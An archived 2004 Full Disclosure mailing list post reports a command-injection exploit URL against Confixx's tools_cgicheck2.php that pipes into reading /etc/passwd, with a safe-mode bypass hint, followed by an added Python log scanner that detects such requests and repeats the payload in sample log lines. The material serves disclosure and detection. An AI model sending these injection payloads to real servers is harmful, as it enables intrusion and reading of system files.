Full Disclosure mailing list archives
Re: Re: Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW
From: checker () mail krefeld schulen net
Date: 10 Mar 2004 14:52:53 -0000
In 2003 I successfully tested the following exploit on the sw-soft Confixx demo version:

http://confixx-demo.sw-soft.com/user/tools_cgicheck2.php?dir=&file=%20./x%20|/bin/cat%20/etc/passwd

I am sure it still works on many servers. The PHP safe mode is not really a protection against this bug because there are several possibilities to skip safe mode (e.g. "date -f /etc/passwd").

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW checker (Mar 09)
- Re: Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW Tim (Mar 09)
- Re: Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW Tim (Mar 09)
- <Possible follow-ups>
- Re: Re: Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW checker (Mar 10)
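
Added example (not part of the original post and not Confixx code): a log check a defender could run to find requests matching the pattern in the message above, i.e. shell metacharacters in the dir or file parameter of tools_cgicheck2.php, whether sent raw or percent-encoded. The common/combined access log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script and parameter names are taken from the URL in the post.
TARGET_SCRIPT = "tools_cgicheck2.php"
WATCHED_PARAMS = {"dir", "file"}
# Characters a shell treats as command separators, pipes or substitutions.
SHELL_META = re.compile(r"[|;&`$<>\n]")
# Request field of a common/combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(url):
    """Return [(param, decoded_value)] for watched params holding shell metacharacters."""
    parts = urlsplit(url)
    if not parts.path.endswith("/" + TARGET_SCRIPT):
        return []
    hits = []
    # parse_qsl percent-decodes values, so %7C is seen as '|'.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in WATCHED_PARAMS and SHELL_META.search(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Return [(line_number, param, decoded_value)] for matching log lines."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for name, value in suspicious_params(m.group(1)):
            findings.append((n, name, value))
    return findings

# Constructed sample log lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Mar/2004:14:40:01 +0000] "GET /user/tools_cgicheck2.php?dir=cgi-bin&file=test.pl HTTP/1.0" 200 512',
    '192.0.2.77 - - [10/Mar/2004:14:41:12 +0000] "GET /user/tools_cgicheck2.php?dir=&file=%20./x%20|/bin/cat%20/etc/passwd HTTP/1.0" 200 1843',
    '192.0.2.10 - - [10/Mar/2004:14:42:30 +0000] "GET /user/index.php?file=a|b HTTP/1.0" 200 90',
    '192.0.2.77 - - [10/Mar/2004:14:43:05 +0000] "GET /user/tools_cgicheck2.php?dir=&file=./x%20%7C/bin/cat%20/etc/passwd HTTP/1.0" 200 1843',
]

if __name__ == "__main__":
    for lineno, param, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: {param}={value!r}")
```

Because safe mode is described above as bypassable, a hit here should be treated as a possible successful read and followed up on the host, not dismissed on the basis of the PHP configuration.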